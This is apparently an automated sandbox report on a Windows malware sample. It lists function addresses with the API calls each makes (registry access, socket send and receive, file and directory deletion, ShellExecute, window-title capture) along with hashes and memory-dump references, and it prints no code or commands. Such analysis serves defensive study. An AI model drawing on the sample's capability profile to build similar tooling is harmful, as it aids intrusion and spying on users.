                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentStrings$Free_free
                                              • String ID:
                                              • API String ID: 2716640707-0
                                              • Opcode ID: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                              • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                              • Opcode Fuzzy Hash: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                              • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                              Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                              • RegCloseKey.KERNEL32(?), ref: 004135CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                              • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                              • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                              • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                              Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                              • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                              • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                              • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                              • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                              Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                              • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                              • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID:
                                              • API String ID: 1818849710-0
                                              • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                              • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                              • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                              • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                              Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: pQG
                                              • API String ID: 176396367-3769108836
                                              • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                              • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                              • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                              • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                              Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                              • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                              • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                              • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                              Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00446227
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap$_free
                                              • String ID:
                                              • API String ID: 1482568997-0
                                              • Opcode ID: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                              • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                              • Opcode Fuzzy Hash: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                              • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                              Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEventStartupsocket
                                              • String ID:
                                              • API String ID: 1953588214-0
                                              • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                              • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                              • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                              • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                              Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                              • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                              • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                              • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                              Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 0041BB49
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$ForegroundText
                                              • String ID:
                                              • API String ID: 29597999-0
                                              • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                              • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                              • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                              • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                              Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                              • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                              • String ID:
                                              • API String ID: 1170566393-0
                                              • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                              • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                              • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                              • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                              Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                              • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                              • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                              • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                              Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                              • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                              • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                              • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                              Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                              • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                              • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                              • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                              Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                              • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                              • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                              • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725

                                              Non-executed Functions

                                              Function 00407CD2 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 835filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                              • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C37D
                                                • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C3AD
                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C402
                                                • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C463
                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,8)[,004752F0,00000001), ref: 0041C46A
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                              • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                              • Sleep.KERNEL32(000007D0), ref: 00408733
                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
